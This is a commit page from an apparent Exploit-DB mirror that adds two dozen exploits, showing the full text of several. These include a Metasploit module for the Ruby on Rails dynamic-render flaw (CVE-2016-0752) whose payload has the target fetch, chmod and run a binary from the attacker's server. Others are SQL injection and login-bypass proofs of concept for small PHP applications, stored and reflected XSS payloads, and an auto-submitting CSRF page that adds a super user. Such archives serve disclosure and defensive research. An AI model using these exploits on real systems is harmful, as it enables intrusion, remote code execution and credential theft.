bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-10-18

Browse source 
24 new exploits

Entrepreneur Job Portal Script - SQL Injection
Entrepreneur Job Portal Script 2.06 - SQL Injection
NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation

HP Client - Automation Command Injection / Remote Code Execution
HP Client 9.1/9.0/8.1/7.9 - Command Injection

NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation
NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation
Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation
Firefox 49.0.1 - Denial of Service
Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation
NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation
NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation
Student Information System (SIS) 0.1 - Authentication Bypass
Web Based Alumni Tracking System 0.1 - SQL Injection
Simple Dynamic Web 0.1 - SQL Injection
Learning Management System 0.1 - Authentication Bypass
Fashion Shopping Cart 0.1 - SQL Injection
Health Record System 0.1 - Authentication Bypass
Windows x64 - WinExec() Shellcode (93 bytes)
Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation
PHP Telephone Directory - Multiple Vulnerabilities
Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting
PHP Image Database - Multiple Vulnerabilities
Simple Shopping Cart Application 0.1 - SQL Injection
PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
School Full CBT 0.1 - SQL Injection
PHP Business Directory - Multiple Vulnerabilities
Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)
Ruby on Rails - Dynamic Render File Upload Remote Code Execution
Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
This commit is contained in:
Offensive Security 2016-10-18 05:01:18 +00:00
parent 113ab3e40e
commit 558ab1fc67
26 changed files with 2247 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
files.csv
View file

@ -36597,7 +36597,8 @@ id,file,description,date,author,platform,type,port
40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0 40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0 40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0 40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
@ -36611,7 +36612,7 @@ id,file,description,date,author,platform,type,port
40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0 40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0 40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0 40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0 40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
@ -36645,5 +36646,28 @@ id,file,description,date,author,platform,type,port
40530,platforms/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,php,webapps,0 40530,platforms/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,php,webapps,0
40531,platforms/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",php,webapps,0 40531,platforms/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",php,webapps,0
40532,platforms/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",php,webapps,0 40532,platforms/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",php,webapps,0
40533,platforms/windows/local/40533.txt,"NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0 40533,platforms/windows/local/40533.txt,"NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0
40534,platforms/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",php,webapps,0 40534,platforms/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",php,webapps,0
40535,platforms/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",windows,local,0
40536,platforms/windows/dos/40536.py,"Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0
40538,platforms/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",windows,local,0
40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40541,platforms/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40542,platforms/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
40543,platforms/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
40544,platforms/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
40545,platforms/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
40546,platforms/php/webapps/40546.txt,"Fashion Shopping Cart 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
40547,platforms/php/webapps/40547.txt,"Health Record System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40550,platforms/windows/local/40550.txt,"Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation",2016-10-17,Amir.ght,windows,local,0
40552,platforms/php/webapps/40552.txt,"PHP Telephone Directory - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps,0
40553,platforms/php/webapps/40553.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting",2016-10-17,"Ahsan Tahir",php,webapps,80
40554,platforms/php/webapps/40554.txt,"PHP Image Database - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps,0
40555,platforms/php/webapps/40555.txt,"Simple Shopping Cart Application 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
40557,platforms/php/webapps/40557.html,"PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)",2016-10-16,"Meryem AKDOĞAN",php,webapps,0
40558,platforms/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
40559,platforms/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,php,webapps,0
40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0
40562,platforms/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local,0

Can't render this file because it is too large.

200
platforms/multiple/remote/40561.rb Executable file
View file

@ -0,0 +1,200 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the explicit render
method when leveraging user parameters.
This module has been tested across multiple versions of Ruby on Rails.
The technique used by this module requires the specified
endpoint to be using dynamic render paths, such as the following example:
def show
render params[:id]
end
Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
can literally be any endpoint. This module doesnt use the log inclusion method of
exploitation due to it not being universal enough. Instead, a new code injection
technique was found and used whereby an attacker can upload temporary image files
against any POST endpoint and use them for the inclusion attack. Finally, you only
get one shot at this if you are testing with the builtin rails server, use caution.
},
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector
'John Poulin (forced-request)' # original render bug finder
],
'References' =>
[
[ 'CVE', '2016-0752'],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch
[ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
[ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'bsd'],
'Arch' => ARCH_X86,
'Payload' =>
{
'DisableNops' => true,
},
'Privileged' => false,
'Targets' =>
[
[ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2016'))
register_options(
[
Opt::RPORT(3000),
OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
], self.class)
end
def check
# this is the check for the dev environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2f"),
'method' => 'GET',
}, 60)
# if the page controller is dynamically rendering, its for sure vuln
if res and res.body =~ /render params/
return CheckCode::Vulnerable
end
# this is the check for the prod environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
'method' => 'GET',
}, 60)
# if we can read files, its likley we can execute code
if res and res.body =~ /ruby/
return CheckCode::Appears
end
return CheckCode::Safe
end
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
def send_payload
@bd = rand_text_alpha(8+rand(8))
fn = rand_text_alpha(8+rand(8))
un = rand_text_alpha(8+rand(8))
pn = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
cmd = "wget #{@service_url} -O /tmp/#{@bd};"
cmd << "chmod 755 /tmp/#{@bd};"
cmd << "/tmp/#{@bd}"
pay = "<%=`#{cmd}`%>"
print_status("uploading image...")
data = Rex::MIME::Message.new
data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
res = send_request_cgi({
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(datastore['URIPATH'], pn),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
return true
else
# this is where we pull the log file
if leak_log
return true
end
end
return false
end
def leak_log
# path to the log /proc/self/fd/7
# this bypasses the extension check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
'method' => 'GET',
}, 60)
if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
return true
end
return false
end
def start_http_server
@pl = generate_payload_exe
@elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
@service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end
def render_tmpfile
@path.gsub!(/\//, '%2f')
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], @path),
'method' => 'GET',
}, 1)
end
def exploit
print_status("Sending initial request to detect exploitability")
start_http_server
if send_payload
print_good("injected payload")
render_tmpfile
# we need to delay, for the stager
select(nil, nil, nil, 5)
end
end
end

1
platforms/php/webapps/40479.txt
View file

@ -3,7 +3,6 @@
| Software : Entrepreneur Job Portal Script | Software : Entrepreneur Job Portal Script
| Version : 2.06 | Version : 2.06
| Vendor : http://www.i-netsolution.com/ | Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/entrepreneur-job-portal-script/live_demo/853208
| Date : 07 October 2016 | Date : 07 October 2016
| Author : OoN_Boy | Author : OoN_Boy
[x]========================================================================================================================================[x] [x]========================================================================================================================================[x]

68
platforms/php/webapps/40542.txt Executable file
View file

@ -0,0 +1,68 @@
# Exploit Title............... Student Information System (SIS) Auth Bypass
# Google Dork................. N/A
# Date........................ 14/10/2016
# Exploit Author.............. lahilote
# Vendor Homepage............. http://www.sourcecodester.com/php/10902/student-information-system-sis.html
# Software Link............... http://www.sourcecodester.com/sites/default/files/download/Bwire%20Charles/ucc.zip
# Version..................... 0.1
# Tested on................... xampp
# CVE......................... N/A
The audit_list in ucc/admin_login.php
-------------------------------------
----snip----
error_reporting(E_ALL ^ E_DEPRECATED);
if(isset($_POST['submit'])) {
include 'database_config2.php';
$myusername = $_POST['username'];
$mypassword = $_POST['password'];
$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'";
$result = mysql_query($query);
$count = mysql_num_rows($result);
mysql_close();
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example:
error_reporting(E_ALL ^ E_DEPRECATED);
if(isset($_POST['submit'])) {
include 'database_config2.php';
$myusername = mysql_real_escape_string($_POST['username']);
$mypassword = mysql_real_escape_string($_POST['password']);
$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'";
$result = mysql_query($query);
$count = mysql_num_rows($result);
mysql_close();
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10902/student-information-system-sis.html
http://php.net/manual/en/function.mysql-real-escape-string.php

68
platforms/php/webapps/40543.txt Executable file
View file

@ -0,0 +1,68 @@
# Exploit Title.............. Web Based Alumni Tracking System Multiple Vulnerability
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/John%20Mark%20Ulep/web-based_alumni_tracking_system.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /admin/print_employed.php
-------------------------------
----snip----
48 <?php $get_id = $_GET['id'];?>
----snip----
/admin/index.php
----------------
----snip----
$user = $_POST['username'];
$password = $_POST['password'];
$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error());
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/admin/print_employed.php?id=-2%27%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12%20from%20user--+
http://server/path_to_webapp/admin/index.php
Login with username and password: admin' or '1'='1
How to fix
----------
Simple method's use the php function intval and mysql_real_escape_string.
Example: /admin/print_employed.php
48 <?php $get_id = intval($_GET['id']);?>
Example: /admin/index.php
$user = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error());
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html
http://php.net/manual/en/function.intval.php
http://php.net/manual/en/function.mysql-real-escape-string.php

55
platforms/php/webapps/40544.txt Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title.............. Simple Dynamic Web SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /page.php
----snip----
$prodID = $_GET['prodid'];
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$ptitle = $getProdInfo["title"];
$pdes = $getProdInfo["description"];
$pimg = $getProdInfo["imgUrl"];
}
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+
How to fix
----------
Simple method's use the php function intval.
For example
$prodID = intval($_GET['prodid']);
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$ptitle = $getProdInfo["title"];
$pdes = $getProdInfo["description"];
$pimg = $getProdInfo["imgUrl"];
}
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
http://php.net/manual/en/function.intval.php

85
platforms/php/webapps/40545.txt Executable file
View file

@ -0,0 +1,85 @@
# Exploit Title.............. Learning Management System Auth Bypass
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/jkev/lms.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in lms/login.php
-------------------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
/* student */
$query = "SELECT * FROM student WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
$num_row = mysql_num_rows($result);
/* teacher */
$query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error());
$num_row_teacher = mysql_num_rows($query_teacher);
$row_teahcer = mysql_fetch_array($query_teacher);
if( $num_row > 0 ) {
----snip----
lms/admin/login.php
-------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
$query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error());
$count = mysql_num_rows($query);
$row = mysql_fetch_array($query);
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example: lms/login.php
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
/* student */
$query = "SELECT * FROM student WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
$num_row = mysql_num_rows($result);
/* teacher */
$query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error());
$num_row_teacher = mysql_num_rows($query_teacher);
$row_teahcer = mysql_fetch_array($query_teacher);
if( $num_row > 0 ) {
Example: lms/admin/login.php
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error());
$count = mysql_num_rows($query);
$row = mysql_fetch_array($query);
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/7339/learning-management-system.html
http://php.net/manual/en/function.mysql-real-escape-string.php

45
platforms/php/webapps/40546.txt Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title.............. Fashion Shopping Cart SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10435
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/aniketsmarty/online_shopping.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /admin/dd.php
-------------------------------
----snip----
$q=$_GET["q"];
$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/admin/dd.php?q=-1%27%20union%20select%201,version()--+
How to fix
----------
Simple method's use the php function intval.
For example
$q=intval($_GET["q"]);
$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/10435
http://php.net/manual/en/function.intval.php

54
platforms/php/webapps/40547.txt Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title.............. Health Record System Auth Bypass
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10430
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Jesutoyeboluwatife/vital.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in vital/signin.php
-------------------------------
----snip----
if (isset($_POST['submit'])){
$lga_id=$_POST['lgaid'];
$pw=$_POST['pwd'];
$_SESSION['username'] = $lga_id;
$sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' ");
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example:
if (isset($_POST['submit'])){
$lga_id=mysql_real_escape_string($_POST['lgaid']);
$pw=mysql_real_escape_string($_POST['pwd']);
$_SESSION['username'] = $lga_id;
$sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' ");
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/10430
http://php.net/manual/en/function.mysql-real-escape-string.php

103
platforms/php/webapps/40552.txt Executable file
View file

@ -0,0 +1,103 @@
# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2
# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip
---------------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phptelephonedirectory/index.php?key=<svg/onload=alert(1)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php?key=<svg/onload=alert(1)>
# 0x01 Stored XSS
---
1.In administration web directory interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php
?pageaction=newcontact
&subaction=submit
&id=1
&dtDOBDate=0000-00-00
&pointcode=<script>alert(1)/*
&contacttitle=*/</script>
&firstname=<script>alert(2)</script>
&lastname=<script>alert(3)</script>
&middlename=<script>alert(4)</script>
&DOBdateradio=usenew
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2015
&employeeID=<script>alert(5)/*
&otherID=*/</script>
&phonenumber1=<script>alert(6)</script>
&internalphonenumber=<script>alert(7)</script>
&phonenumber2=<script>alert(8)</script>
&phonenumber3=<script>alert(9)</script>
&fax=<script>alert(10)</script>
&mobilecell=<script>alert(11)</script>
&email=<script>alert(12)</script>
&alternateemail=<script>alert(13)</script>
&chat=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&contactposition=<script>alert(19)</script>
&company=<script>alert(20)</script>
&qualifications=<script>alert(21)</script>
&departmentnewedit=
&buildingroom=<script>alert(22)</script>
&address=<script>alert(23)</script>
&city=<script>alert(24)</script>
&suburb=<script>alert(25)</script>
&tdstate=<script>alert(26)</script>
&zippostcode=<script>alert(27)/*
&country=*/</script><script>alert(28)</script>
&description=<script>alert(29)</script>
&recordstatus=active
2.In administration web department interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phptelephonedirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *

249
platforms/php/webapps/40553.txt Executable file
View file

@ -0,0 +1,249 @@
# Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin
# Date: 15-10-2016
# Software Link: http://www.subrion.org/download/
# Vendor: http://www.subrion.org
# Google Dork: "Powered by Subrion CMS"
# Exploit Author: Ahsan Tahir
